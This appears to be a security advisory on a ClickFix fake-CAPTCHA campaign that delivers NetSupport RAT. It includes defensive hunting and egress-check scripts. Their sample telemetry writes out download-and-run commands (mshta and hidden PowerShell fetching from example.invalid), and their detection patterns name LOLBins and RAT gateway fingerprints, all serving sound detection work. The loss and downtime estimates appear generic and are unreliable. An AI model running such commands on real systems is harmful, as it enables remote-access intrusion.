Executive Summary
In November 2025, the SmartApeSG campaign shifted tactics to ClickFix-style fake CAPTCHA pages that deliver NetSupport RAT, a commercial remote-access tool that is routinely abused as a remote access trojan. The threat actors injected scripts into compromised websites that, under specific conditions, displayed a convincing 'verify you are human' prompt. Following the prompt's instructions, users pasted and ran a command the page had silently placed on their clipboard; that command downloaded and launched NetSupport RAT on their Windows systems, and persistence was established through a shortcut placed under the user's Start Menu. The campaign was notable for this adaptation and for the regular rotation of its malicious infrastructure.
This incident highlights a rising trend: social engineering that turns the user into the delivery mechanism, so the malware never has to pass an email gateway or exploit a vulnerability. Fake CAPTCHA lures are proliferating, which makes email filtering and signature-based endpoint controls less effective on their own. Organizations should track these evolving attack chains and update user-awareness training to cover 'paste this command to continue' lures.
Why This Matters Now
The SmartApeSG campaign shows how attackers blend social engineering with modern malware delivery to sidestep controls that look for exploits or malicious attachments: the victim runs the command, so nothing is exploited and nothing arrives by email. The speed at which this actor rotates infrastructure, together with the spread of similar web-delivered RAT infections, makes this an urgent risk for enterprises and individuals who may unwittingly grant an attacker persistent access.
Attack Path Analysis
The SmartApeSG campaign lured users to compromised sites showing a fake CAPTCHA; when the user followed its instructions, the clipboard-injected command ran through mshta and delivered NetSupport RAT (Initial Compromise). The RAT persisted under the user's profile and did not escalate privileges; everything it did ran as the logged-on user (Privilege Escalation). From that foothold the operator could attempt lateral movement by connecting to adjacent hosts or services (Lateral Movement). NetSupport RAT maintained a persistent C2 channel to the actor's gateway over outbound web traffic (Command & Control). The RAT's remote control, file transfer and remote shell capabilities could enable exfiltration of data or credentials (Exfiltration). The campaign's impact included persistent remote access, data exposure, and a staging point for further malicious actions (Impact).
Kill Chain Progression
Initial Compromise
Description
Users visited compromised websites whose injected scripts led them to a fake CAPTCHA page. The page copied a malicious command to the clipboard and instructed the user to paste and run it, resulting in NetSupport RAT installation.
Related CVEs
CVE-2025-34181 (CVSS 8.7)
A path traversal vulnerability in NetSupport Manager versions prior to 14.12.0001 allows attackers with a valid Gateway Key to write arbitrary files to server locations, potentially leading to remote code execution.
Affected Products: NetSupport Ltd. NetSupport Manager < 14.12.0001
Exploit Status: proof of concept
Note that this CVE concerns the NetSupport Manager server/gateway component and is not part of the SmartApeSG attack chain described above, which relies on social engineering and abuse of the legitimate NetSupport client rather than on any vulnerability.
MITRE ATT&CK® Techniques
Drive-by Compromise
User Execution: Malicious Copy and Paste
Command and Scripting Interpreter: Windows Command Shell
System Binary Proxy Execution: Mshta
Scheduled Task/Job: Scheduled Task
Boot or Logon Autostart Execution: Shortcut Modification
Ingress Tool Transfer
Remote Access Software
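The chain described in the attack path and mapped to the techniques above leaves a recognisable host footprint: a living-off-the-land binary launched from the Run dialog with a URL on its command line, a shortcut written into the user's Startup folder, and the NetSupport client executable running from the user profile. The following hunting script is an added example written for this advisory, not code from the ISC diary or from any of the page's sources. The event records are a constructed, Sysmon-like subset (EventID 1 process-create, EventID 11 file-create) and the field names are assumptions; example.invalid is a reserved name, not an indicator.

```python
"""Hunt for the ClickFix -> LOLBin -> NetSupport chain in Windows process and file telemetry.

Added example for this advisory, not code from the ISC diary or from the page's
sources. Event records are a constructed, Sysmon-like subset (EventID 1 =
process create, EventID 11 = file create); the field names are assumptions.
"""
import re

# Living-off-the-land binaries a ClickFix page typically tells the victim to run
# from the Win+R dialog. The Run dialog's parent process is explorer.exe, and a
# first-stage LOLBin frequently spawns a second one (mshta -> powershell).
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
CHAIN_PARENTS = {"explorer.exe"} | LOLBINS
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Per-user Startup folder under the Start Menu: anything written here runs at logon.
STARTUP_LNK_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"^c:\\users\\[^\\]+\\(appdata|downloads|desktop)\\", re.IGNORECASE)
NETSUPPORT_CLIENT = "client32.exe"  # executable name of the NetSupport Manager client
FULL_CHAIN = {"lolbin_remote_fetch", "startup_shortcut_persistence", "netsupport_client_in_profile"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[tuple[str, str]]:
    """Return (rule, detail) pairs that fire for a single event."""
    hits = []
    if ev.get("id") == 1:
        image, parent, cmd = basename(ev["image"]), basename(ev.get("parent", "")), ev.get("cmdline", "")
        url = URL_RE.search(cmd)
        # Stage 1: a LOLBin started from the Run dialog (or by another LOLBin) with a URL on its command line.
        if image in LOLBINS and parent in CHAIN_PARENTS and url:
            hits.append(("lolbin_remote_fetch", f"{parent} -> {image} fetching {url.group(0)}"))
        # Stage 3: the NetSupport client running from a user-writable path rather than Program Files.
        if image == NETSUPPORT_CLIENT and USER_WRITABLE_RE.match(ev["image"]):
            hits.append(("netsupport_client_in_profile", ev["image"]))
    elif ev.get("id") == 11:
        # Stage 2: a shortcut dropped into the Startup folder (the persistence described above).
        if STARTUP_LNK_RE.search(ev.get("target", "")):
            hits.append(("startup_shortcut_persistence", ev["target"]))
    return hits


def hunt(events: list[dict]) -> list[dict]:
    return [{"host": ev["host"], "user": ev["user"], "rule": rule, "detail": detail}
            for ev in events for rule, detail in check_event(ev)]


def hosts_with_full_chain(findings: list[dict]) -> list[str]:
    """Hosts on which all three stages were observed: escalate these first."""
    seen: dict[str, set[str]] = {}
    for f in findings:
        seen.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in seen.items() if FULL_CHAIN <= rules)


# Constructed sample telemetry (not real IOCs; example.invalid is a reserved name).
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "user": "CORP\\jdoe", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify/captcha.hta"},
    {"id": 1, "host": "ws01", "user": "CORP\\jdoe", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/client.zip -OutFile $env:TEMP\\c.zip"'},
    {"id": 11, "host": "ws01", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk"},
    {"id": 1, "host": "ws01", "user": "CORP\\jdoe", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\jdoe\AppData\Roaming\Update\client32.exe", "cmdline": "client32.exe"},
    # Benign noise: Office launched from the desktop, and an admin running a local script with no URL.
    {"id": 1, "host": "ws02", "user": "CORP\\asmith", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "cmdline": "WINWORD.EXE"},
    {"id": 1, "host": "ws02", "user": "CORP\\asmith", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    findings = hunt(SAMPLE_EVENTS)
    for f in findings:
        print(f)
    print("full chain on:", hosts_with_full_chain(findings))
```

The URL condition on the first rule is what keeps the administrator's local PowerShell script out of the results; the three-stage correlation in hosts_with_full_chain is what separates a host that merely ran mshta from one that has the RAT installed and persisted.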
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Protection from malicious software
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management
Control ID: Art. 9
CISA Zero Trust Maturity Model 2.0 – Phishing Resistance and User Awareness
Control ID: User: Phishing and Social Engineering Resilience
NIS2 Directive – Incident Prevention, Detection, and Response
Control ID: Art. 21(2)(a)(d)
Sector Implications
Industry-specific impact of this campaign, including operational, regulatory, and cloud security risks.
Financial Services
NetSupport RAT delivered through ClickFix social engineering bypasses traditional perimeter defenses and puts sensitive financial data at risk, which calls for stronger egress controls.
Health Care / Life Sciences
Remote access trojans threaten HIPAA compliance by enabling data exfiltration and lateral movement across healthcare networks, which calls for zero trust segmentation.
Information Technology/IT
The SmartApeSG campaign relies on compromised websites and clipboard injection, so detection depends on multicloud visibility and inline intrusion prevention rather than email controls.
Government Administration
The RAT's command and control infrastructure gives attackers persistent access to government systems, which requires enhanced threat detection capabilities and secure hybrid connectivity.
Sources
- SANS ISC, "SmartApeSG campaign uses ClickFix page to push NetSupport RAT" (Wed, Nov 12th), https://isc.sans.edu/diary/rss/32474
- VMware, "NetSupport RAT: The RAT King Returns", https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html
- SecurityWeek, "NetSupport Manager RAT Spread via Fake Updates", https://www.securityweek.com/netsupport-manager-rat-spread-fake-updates/
- Trellix, "Exploring New Techniques of Fake Browser Updates Leading to NetSupport RAT", https://www.trellix.com/about/newsroom/stories/research/new-techniques-of-fake-browser-updates/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Layered Zero Trust controls, including network segmentation, egress policy enforcement, inline intrusion prevention, and traffic visibility, would have restricted the infection pathway, detected the RAT's C2 activity, and limited the lateral movement risk. Enforcing these measures across cloud/hybrid workloads and user access would meaningfully limit or stop the SmartApeSG kill chain.
Control: Threat Detection & Anomaly Response
Mitigation: mshta or PowerShell launched from the Run dialog, and the anomalous outbound web requests that follow, would trigger detections and alerts.
Control: Zero Trust Segmentation
Mitigation: Workload segmentation restricts what the initially infected host can reach, containing the persistent foothold.
Control: East-West Traffic Security
Mitigation: Unapproved lateral SMB, RDP, or API communications are blocked and logged.
Control: Egress Security & Policy Enforcement
Mitigation: Unapproved outbound connections to malicious FQDNs/IPs are blocked or alerted on.
Control: Cloud Firewall (ACF)
Mitigation: Outbound sessions to unapproved destinations and unusual data flows are blocked.
Integrating threat intelligence, runtime observation, and automated quarantine contains the threat.
Impact at a Glance
Affected Business Functions
- IT Operations
- Data Security
- Compliance
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive corporate data, including intellectual property and customer information, due to unauthorized remote access facilitated by NetSupport RAT.
Recommended Actions
Key Takeaways & Next Steps
- Implement strict egress filtering and FQDN allow-lists to prevent unauthorized C2 communication from cloud or hybrid endpoints.
- Deploy Zero Trust Segmentation and East-West Traffic Security to contain RAT movement and minimize lateral exposure.
- Operationalize Threat Detection & Anomaly Response to catch anomalous clipboard, mshta, and web activity indicative of phishing or RAT delivery.
- Employ distributed cloud firewalls and inline IPS signatures for early detection and blocking of known RAT artifacts and malicious downloads.
- Continuously review and baseline all workload-to-workload traffic, harnessing multicloud visibility to rapidly identify and isolate compromised assets.
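The egress filtering, FQDN allow-list and anomalous-outbound-request recommendations above are easiest to reason about against concrete proxy logs. The following script is an added example written for this advisory, not code from the ISC diary or from any of the page's sources. The log format, the allow-list and every destination in it are constructed (TEST-NET-3 address and reserved example domains, not indicators); the NetSupport fingerprints it looks for, the User-Agent "NetSupport Manager/1.3" and POSTs to /fakeurl.htm, are the gateway-protocol markers commonly reported in public analyses of the RAT.

```python
"""Flag NetSupport gateway beaconing and egress policy violations in proxy logs.

Added example for this advisory, not code from the ISC diary or the page's
sources. Log format, allow-list and destinations are constructed; the
NetSupport markers (User-Agent "NetSupport Manager/1.3", POST /fakeurl.htm)
are the gateway-protocol fingerprints commonly reported in public analyses.
"""
import csv
import io
import ipaddress
import statistics
from collections import defaultdict
from datetime import datetime

NETSUPPORT_UA_PREFIX = "NetSupport Manager/"
NETSUPPORT_GATEWAY_PATH = "/fakeurl.htm"
# Assumed egress allow-list: a destination passes if it equals an entry or is a subdomain of one.
EGRESS_ALLOW = {"example.com", "example.org"}


def parse_log(text: str) -> list[dict]:
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["ts"] = datetime.strptime(r["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rows


def is_allowed(host: str) -> bool:
    return any(host == a or host.endswith("." + a) for a in EGRESS_ALLOW)


def is_raw_ip(host: str) -> bool:
    """Direct-to-IP web traffic is rare for users and common for RAT gateways."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(rows: list[dict]) -> list[tuple[dict, list[str]]]:
    """Per-request reasons to block or alert; rows with no reason are omitted."""
    out = []
    for r in rows:
        reasons = []
        if r["user_agent"].startswith(NETSUPPORT_UA_PREFIX):
            reasons.append("netsupport_user_agent")
        if r["method"] == "POST" and r["path"] == NETSUPPORT_GATEWAY_PATH:
            reasons.append("netsupport_gateway_path")
        if is_raw_ip(r["dst_host"]):
            reasons.append("raw_ip_destination")
        if not is_allowed(r["dst_host"]):
            reasons.append("egress_not_allowed")
        if reasons:
            out.append((r, reasons))
    return out


def beacons(rows: list[dict], min_count: int = 4, max_jitter: float = 0.2) -> list[dict]:
    """Find (src, dst, path) POST series whose inter-request interval is nearly constant.

    jitter = stdev / mean of the gaps; a RAT polling its gateway on a timer scores near 0,
    which catches the channel even if the actor changes the User-Agent and path.
    """
    series = defaultdict(list)
    for r in rows:
        if r["method"] == "POST":
            series[(r["src"], r["dst_host"], r["path"])].append(r["ts"])
    found = []
    for (src, dst, path), stamps in series.items():
        if len(stamps) < min_count:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            found.append({"src": src, "dst": dst, "path": path, "count": len(stamps), "period_s": mean})
    return found


# Constructed proxy log: TEST-NET-3 address and reserved example domains, not real IOCs.
SAMPLE_LOG = """ts,src,dst_host,method,path,user_agent,bytes_out
2025-11-12T09:00:00Z,10.1.1.23,203.0.113.10,POST,/fakeurl.htm,NetSupport Manager/1.3,412
2025-11-12T09:00:30Z,10.1.1.23,203.0.113.10,POST,/fakeurl.htm,NetSupport Manager/1.3,410
2025-11-12T09:01:00Z,10.1.1.23,203.0.113.10,POST,/fakeurl.htm,NetSupport Manager/1.3,413
2025-11-12T09:01:30Z,10.1.1.23,203.0.113.10,POST,/fakeurl.htm,NetSupport Manager/1.3,411
2025-11-12T09:02:00Z,10.1.1.23,203.0.113.10,POST,/fakeurl.htm,NetSupport Manager/1.3,409
2025-11-12T09:00:05Z,10.1.1.23,updates.example.com,GET,/manifest.json,Mozilla/5.0,0
2025-11-12T09:00:07Z,10.1.1.40,www.example.org,GET,/,Mozilla/5.0,0
2025-11-12T09:03:00Z,10.1.1.40,cdn.example.net,GET,/assets/app.js,Mozilla/5.0,0
"""

if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    for r, why in classify(rows):
        print(r["src"], "->", r["dst_host"], why)
    print(beacons(rows))
```

In an allow-list model the raw-IP and egress_not_allowed reasons alone would have blocked the gateway traffic before any signature matched; the User-Agent and path checks confirm what was blocked, and the beacon check is the fallback for an actor who rotates infrastructure and rewrites the obvious strings.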